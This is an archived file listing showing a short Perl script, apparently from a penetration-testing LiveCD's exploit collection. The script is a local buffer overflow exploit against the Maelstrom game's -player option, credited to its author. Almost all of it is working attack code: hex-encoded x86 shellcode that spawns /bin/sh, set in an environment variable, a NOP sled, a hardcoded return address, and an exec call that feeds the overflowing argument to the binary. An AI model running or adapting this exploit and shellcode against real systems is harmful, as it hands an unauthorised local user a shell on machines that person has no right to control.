home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / games / maelstrom / maelx.pl < prev   
Perl Script  |  2005-02-12  |  963b  |  33 lines
  1. #!/usr/bin/perl -w
  2. #
  3. # /usr/bin/Maelstrom -player Local Buffer Overflow Exploit by akcess
  4. #
  5. # This code exploits the -player overflow which i discovered after
  6. # reading the initial advisory detailing  the -server  overflow by
  7. # Luca Ercoli
  8. #
  9. # [ akcess@linuxmail.org ] - *21/05/03*
  10.  
  11.  
  12. $sc = "\x90"x1500; # write stdout "akcess wuz here..."; execve /bin/sh; exit;
  13. $sc .= "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x2e\x2e\x20\x0a\x68\x65\x72\x65";
  14. $sc .= "\x2e\x68\x75\x7a\x20\x68\x68\x73\x73\x20\x77\x68\x61\x6b\x63\x65";
  15. $sc .= "\x89\xe1\xb2\x18\xb0\x04\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68";
  16. $sc .= "\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24";
  17. $sc .= "\xb0\x0b\xcd\x80";
  18.  
  19. $ENV{'SC'} = $sc;
  20.  
  21. $offset = "0";
  22. $ret = 0xbffff9ee;
  23.  
  24.  
  25. for ($i = 0; $i < (8177 - 4); $i++) {
  26.     $buf .= "\x90";
  27. }
  28.  
  29.  
  30. $buf .= pack('l', ($ret + $offset));
  31.  
  32. print("Using return address: 0x", sprintf('%lx',($ret + $offset)),"\n");
  33. exec("/usr/bin/Maelstrom -player 1\@'$buf'");